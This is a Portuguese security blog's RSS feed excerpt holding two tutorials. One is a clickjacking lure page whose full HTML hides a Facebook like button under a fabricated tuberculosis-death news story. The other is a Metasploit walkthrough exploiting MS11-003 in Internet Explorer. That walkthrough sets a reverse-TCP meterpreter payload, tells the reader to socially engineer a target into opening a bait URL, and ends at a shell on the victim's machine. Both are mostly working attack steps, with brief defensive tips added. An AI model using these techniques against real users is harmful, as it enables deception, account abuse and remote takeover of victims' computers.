<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://imageshack.us/photo/my-images/843/forumns.png/"  class="http external blank"  rel="nofollow" target="_blank"><img src="http://img843.imageshack.us/img843/6489/forumns.png" alt="" border="0" /></a></p>
<p>O clickjacking é possível por causa de três &#8220;features&#8221; do HTML.</p>
<p><strong>Iframe:<br />
</strong><br />
<a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://imageshack.us/photo/my-images/820/iframe.png/"  class="http external blank"  rel="nofollow" target="_blank"><img src="http://img820.imageshack.us/img820/2923/iframe.png" alt="" border="0" /></a>Uma pagina é aberta dentro de outra.</p>
<p><strong>Opacidade:</strong></p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://imageshack.us/photo/my-images/43/opacityb.png/"  class="http external blank"  rel="nofollow" target="_blank"><img src="http://img43.imageshack.us/img43/5042/opacityb.png" alt="" border="0" /></a>Elementos podem ter transparência, podendo ser invisíveis.</p>
<p><strong>Camadas(Stacking Order):</strong></p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://imageshack.us/photo/my-images/842/camadas.png/"  class="http external blank"  rel="nofollow" target="_blank"><img src="http://img842.imageshack.us/img842/7185/camadas.png" alt="" border="0" /></a>Podemos ordenar os elementos em camadas.</p>
<p>Quando juntamos essas três features podemos efetuar o clickjacking, que consiste em colocar uma outra página transparente na frente do usuário, quando o usuário clickar em algum lugar, na verdade ele estará clickando na página invisível na frente dele.</p>
<p>Exemplo:</p>
<p>Para esse artigo criei uma página em html que fala sobre uma doença incurável e coloquei um link para que a pessoa veja um vídeo.</p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://imageshack.us/photo/my-images/819/snapshot1vn.png/"  class="http external blank"  rel="nofollow" target="_blank"><img src="http://img819.imageshack.us/img819/7333/snapshot1vn.png" alt="" border="0" /></a></p>
<p>Mas na verdade existe um outro elemento invisível na frente do link &#8220;Veja o vídeo&#8221;, aumentando a opacidade podemos vê-lo.</p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://imageshack.us/photo/my-images/839/snapshot2d.png/"  class="http external blank"  rel="nofollow" target="_blank"><img src="http://img839.imageshack.us/img839/3195/snapshot2d.png" alt="" border="0" /></a></p>
<p>O link na frente é um botão curtir do facebook, se o usuário estivesse logado quando clickasse, automaticamente seria postado o link configurado no mural dele.</p>
<p>Código usado no exemplo:</p>
<div>
<div>Código HTML:</div>
<pre class="brush: xml; title: ;">
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html;charset=utf-8&quot; &gt;
&lt;title&gt;ClickJacking Exemplo...&lt;/title&gt;
&lt;/head&gt;&lt;h1 style=&quot;text-align:left&quot;&gt;Pesquisa polêmica apresenta um tipo de tuberculose incurável&lt;/h1&gt;
&lt;p style=&quot;font-size: 16px;&quot;&gt;Há algumas semanas, uma clínica em Mumbai afirmou ter identificado 12 de pacientes
 com uma cepa de tuberculose resistente a todos os tratamentos conhecidos.&lt;br&gt;
 Essa doença é uma infecção pulmonar muito contagiosa e mata cerca de 1,5 milhões de pessoas por ano no mundo, segundo a Organização Mundial da Saúde (OMS).&lt;br&gt;
 Assim, o desenvolvimento de uma forma totalmente intratável seria motivo para alarde. “Significa que não há esperança,
que nenhum medicamento funciona”, diz Madhukar Pai, que pesquisa sobre tuberculose na McGill University, em Montreal..&lt;br&gt; Com exclusividade tivemos acesso a um vídeo onde é mostrado a morte dos 12 pacientes infectados, as imagens foram &lt;br&gt;Obtidas das câmeras da ala de quarentena do hospital,
&lt;font color=&quot;red&quot;&gt;&lt;a href=&quot;&quot;&gt;Veja o vídeo&lt;/a&gt;(Aviso de cenas fortes)&lt;/font&gt;&lt;/p&gt;
&lt;/html&gt;
&lt;div style=&quot;z-index:10; opacity:0.7; position:absolute; top:165px;left:348px;&quot;&gt;&lt;iframe scrolling=&quot;no&quot; style=&quot;width:75px; height:60px;&quot; src=&quot;//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fnoticias.uol.com.br%2Fc  otidiano%2Fultimas-noticias%2F2012%2F03%2F02%2Fadolescente-leva-dois-meses-para-descobrir-que-levou-tiro-na-cabeca-no-interior-de-sao-paulo.htm&amp;amp;send=false&amp;amp;layout=button_count&amp;amp;width=450  &amp;amp;show_faces=false&amp;amp;action=recommend&amp;amp;colorscheme=lig  ht&amp;amp;font&amp;amp;height=21&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:450px; height:21px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
</pre>
<p>Vídeo mostrando o exemplo acima:</p>
</div>
<p><iframe src="http://www.youtube.com/embed/rtlsxKWwaB8" frameborder="0" width="420" height="315"></iframe></p>
<p><strong>Como se proteger?</strong></p>
<p>Client side:<br />
Uso de plugins como o Noscript.<br />
Server Side:<br />
uma das soluções possíveis é o uso da meta tag;</p>
<div>
<div>Código HTML:</div>
<pre class="brush: xml; title: ;">
&lt;meta http-equiv=&quot;X-Frame-Options&quot; content=&quot;deny&quot;&gt;
</pre>
</div>
<p><strong>Conclusão:</strong></p>
<p>Esse exemplo é o mais básico possível de clickjacking, apenas para dar um vislumbre de como funciona o ataque, existem técnicas de clickjacking mais avançadas usando js, html5, etc. Em outra ocasião espero trazer pra vocês, inclusive uma técnica usando mousedrag.</p>
<p>Fonte(Material muito bom para quem quiser se aprofundar).<br />
<a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://javascript.info/tutorial/clickjacking"  class="http external blank"  rel="nofollow" target="_blank">http://javascript.info/tutorial/clickjacking</a><a href="http://www.hacker9.com/clickjacking-attack-things-you-must-know.html" class="http html external blank"  rel="nofollow" target="_blank"></p>
<p>http://www.hacker9.com/clickjacking-attack-things-you-must-know.html</a></p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.exploit-db.com/wp-content/themes/exploit/docs/17881.pdf"  class="http pdf external blank"  rel="nofollow" target="_blank">http://www.exploit-db.com/wp-content&#8230;docs/17881.pdf</a><a href="http://www.yousaytoo.com/what-is-clickjacking-learning-to-clickjack-sites-plus-methods-of-protec/1756442" class="http external blank"  rel="nofollow" target="_blank"></p>
<p>http://www.yousaytoo.com/what-is-clickjacking-learning-to-clickjack-sites-plus-methods-of-protec/1756442</a></p>
<p><a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://en.wikipedia.org/wiki/Clickjacking"  class="http external blank"  rel="nofollow" target="_blank">http://en.wikipedia.org/wiki/Clickjacking</a></p>
<p>Até.</p>
<p><strong>Autor: <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.forum-invaders.com.br/vb/member.php/125500-Animall"  class="http external self" id="yui-gen20" title="Animall está desconectado" >Animall</a></strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/03/12/tutorial-clickjacking-basico/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial Invadindo Win7 (+ Internet Explorer) pelo MSF</title>
		<link>http://www.inw-seguranca.com/2012/03/05/tutorial-invadindo-win7-internet-explorer-pelo-msf/</link>
		<comments>http://www.inw-seguranca.com/2012/03/05/tutorial-invadindo-win7-internet-explorer-pelo-msf/#comments</comments>
		<pubDate>Mon, 05 Mar 2012 23:09:55 +0000</pubDate>
		<dc:creator>Samukt</dc:creator>
				<category><![CDATA[Pen-Test]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.inw-seguranca.com/?p=3198</guid>
		<description><![CDATA[Olá. Foi encontrada no famoso IEca (sim, aquele navegador que deixou de ser o mais usado do mundo) há 1 ano e 21 dias (considerando que hoje é 29/02/12), no motor HTML (Microsoft HTML Engine/mshtml), uma vulnerabilidade que permite a execução de comandos a nível do usuário local (o que significa, na maioria dos computadores]]></description>
			<content:encoded><![CDATA[<div id="HOTWordsTxt" name="HOTWordsTxt"><p>Olá.<br />
Foi encontrada no famoso IEca (sim, aquele navegador que deixou de ser o mais usado do mundo) há 1 ano e 21 dias (considerando que hoje é 29/02/12), no motor HTML (Microsoft HTML Engine/mshtml), uma vulnerabilidade que permite a execução de comandos a nível do usuário local (o que significa, na maioria dos computadores com Windows, o próprio administrador).<br />
Segundo o boletim de &#8220;segurança&#8221; da Microsoft, a execução remota de comandos ocorre &#8220;se um usuário exibir uma página da Web especialmente criada&#8221; utilizando o navegadorzinho deles.</p>
<p><span id="more-3198"></span><br />
O website do Metasploit diz que o módulo explora uma vulnerabilidade que corrompe a memória do HTML Engine. Ao analisar uma página HTML que contém uma importação CSS recursiva, um objeto em C++ é excluído e reutilizado. Em outras palavras, isto quer dizer a possibilidade da execução de código arbitrário. Já que, para bypassear DEP  (recurso de segurança da Microsoft que impede a execução de códigos de uma região da memória não-executável em um aplicativo) e ASLR [em inglês] (método que dispõe randomicamente as posições das chaves áreas de dados), ele precisa de recursos do dotNET (&gt;=2, por ter &#8216;mscorie.dll&#8217;), é necessário que o alvo possua esta ferramenta instalado.<br />
O exploit: ms11_003_ie_css_import. Vamos ver como utilizá-lo:<br />
Abra o Metasploit Framework (eu sou fã do console, mas se você preferir interface gráfica ou web&#8230;). Vamos setar o exploit que utilizaremos:</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf &gt; use exploit/windows/browser/ms11_003_ie_css_import</pre>
</div>
<p>Caso você não possua este módulo, rode &#8220;msfupdate&#8221; e tente usá-lo novamente.<br />
Agora vamos setar o payload utilizado. Pretendemos uma conexão reversa em TCP.</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; set payload windows/meterpreter/reverse_tcp
payload =&gt; windows/meterpreter/reverse_tcp</pre>
</div>
<p>Vamos dar uma olhada em suas opções (variáveis), digitando &#8220;set&#8221; e enter.</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; set
Module: windows/browser/ms11_003_ie_css_import
==============================================

  Name                      Value
  ----                      -----
  DisablePayloadHandler     false
  EXITFUNC                  process
  EnableContextEncoding     false
  HTML::base64              none
  HTML::javascript::escape  0
  HTML::unicode             none
  HTTP::chunked             false
  HTTP::compression         none
  HTTP::header_folding      false
  HTTP::junk_headers        false
  HTTP::server_name         Apache
  InitialAutoRunScript      migrate -f
  OBFUSCATE                 true
  SRVHOST                   0.0.0.0
  SRVPORT                   8080
  SSL                       false
  SSLVersion                SSL3
  TCP::max_send_size        0
  TCP::send_delay           0
  VERBOSE                   false
  payload                   windows/meterpreter/reverse_tcp</pre>
</div>
<p>Vamos setar algumas variáveis que nos interessam:<br />
IP do servidor deverá ser nosso endereço IP.</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; set svrhost seu.ip.aq.ui</pre>
</div>
<p>Agora vamos setar a porta que utilizaremos e o nome do &#8220;arquivo&#8221; que será acessado. Por padrão, os navegadores acessam a porta 80. Você pode utilizá-la se quiser, mas eu optei pela porta 81 pois na porta 80 rodava o Apache e eu não queria desligá-lo (tudo bem, fiquei com preguiça de rodar um &#8216;/etc/init.d/apache2 stop&#8217;).</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; set svrport 81
msf exploit(ms11_003_ie_css_import) &gt; set uripath ganhedinheiro.htm</pre>
</div>
<p>Vamos agora setar o IP e a porta para os quais a conexão reversa, após o exploit trabalhar, será direcionada. Pode ser o mesmo seu endereço IP.</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; set lhost meu.ip.aqu.i
msf exploit(ms11_003_ie_css_import) &gt; set lport 82</pre>
</div>
<p>Tudo pronto? Vamos rodar o comando &#8220;exploit&#8221;:</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; exploit</pre>
</div>
<p>Ele dará alguns detalhes, mas dará também isso:</p>
<div>
<div>Código:</div>
<pre dir="ltr">[*] Using URL: http://meu.ip.a.qui/ganhedinheiro.htm</pre>
</div>
<p>Aí está a URL &#8220;mágica&#8221;. Envie-a para o alvo e, utilizando engenharia social, faça-o acessá-la.<br />
Quando ele acessar, aparecerá em sua janela:</p>
<div>
<div>Código:</div>
<pre dir="ltr">[*] ip.da.vit.ima:porta Received request for "/ganhedinheiro.html"</pre>
</div>
<p>Ele dará alguns detalhes sobre a &#8220;conversa&#8221; TCP e, no final, dará algo semelhante a isso:</p>
<div>
<div>Código:</div>
<pre dir="ltr">[*] New server process: notepad.exe</pre>
</div>
<p>Isto significa que ele gerou um processo chamado notepad.exe na máquina do usuário.<br />
Vamos verificar as sessões para termos certeza de que podemos continuar.</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; sessions -l</pre>
</div>
<p>Aparecerá a lista de sessões. Verifique se o alvo esta lá. Se estiver, ótimo! Pegue a ID do mesmo na primeira coluna (vamos supor que esta é 1), e vamos interagir com ele:</p>
<div>
<div>Código:</div>
<pre dir="ltr">msf exploit(ms11_003_ie_css_import) &gt; sessions -i 1[*] Starting interaction with 1...</pre>
</div>
<p>Enfim, ele nos entrega o seguinte:</p>
<div>
<div>Código:</div>
<pre dir="ltr">meterpreter &gt;</pre>
</div>
<p>Vamos obter algumas informações sobre o sistema, como o nome do computador, o sistema operacional, o idioma e a arquitetura:</p>
<div>
<div>Código:</div>
<pre dir="ltr">meterpreter &gt; sysinfo</pre>
</div>
<p>Tudo certo até aqui? Vamos continuar e partir para a melhor parte: obter acesso ao CMD. Agora é simples, veja:</p>
<div>
<div>Código:</div>
<pre dir="ltr">meterpreter &gt; shell</pre>
</div>
<p>Digitamos o comando &#8220;shell&#8221;, ele mostra alguns detalhes, e&#8230;</p>
<div>
<div>Código:</div>
<pre dir="ltr">Microsoft Windows [Version X]
Copyright (c) 2009 Microsoft Corporation. All rights reverved.

C:\Users\unavailable\Desktop&gt;_</pre>
</div>
<p>Simples, não é mesmo?<br />
Agora eu te pergunto: onde está o seu amor? (Não entendeu? Clique aqui)</p>
<p>Como se proteger? Bem, mantenha seu sistema sempre seguro. Impossível? Pior que sim&#8230;<br />
Mas algumas dicas básicas <em>podem</em> evitar que você não seja uma vítima:<br />
1. Mantenha sempre antivírus e firewall atualizados<br />
2. Atualize sempre seu sistema operacional e navegador<br />
3. Não abra links desconhecidos. Vale, às vezes, abrir o link com um &#8216;view-source:&#8217; na frente, só para analisar um pouco.<br />
4. Considere trocar para <a target="_blank" rel="nofollow" href="http://www.inw-seguranca.com/goto/http://www.debian.org/"  class="http external blank"  rel="nofollow" target="_blank">sistema operacional mais seguro e estável</a> <img title="Feliz" src="http://forum.guiadohacker.com.br/images/smilies/smile.gif" alt="" border="0" /> .</p>
<p>Att, 0KaL.</p>
<p>P. S.: Coincidência; o Jornal da Globo está falando sobre privacidade na internet.</p>
<p>&nbsp;</p>
<p><strong>Autor: 0KaL</strong></p>

<!-- Links Classifier - WordPress plugin -->
</div><center><script type="text/javascript"><!--
google_ad_client = "ca-pub-4528759947742278";
/* 468x60, criado 09/10/09 */
google_ad_slot = "8214544157";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></center>]]></content:encoded>
			<wfw:commentRss>http://www.inw-seguranca.com/2012/03/05/tutorial-invadindo-win7-internet-explorer-pelo-msf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

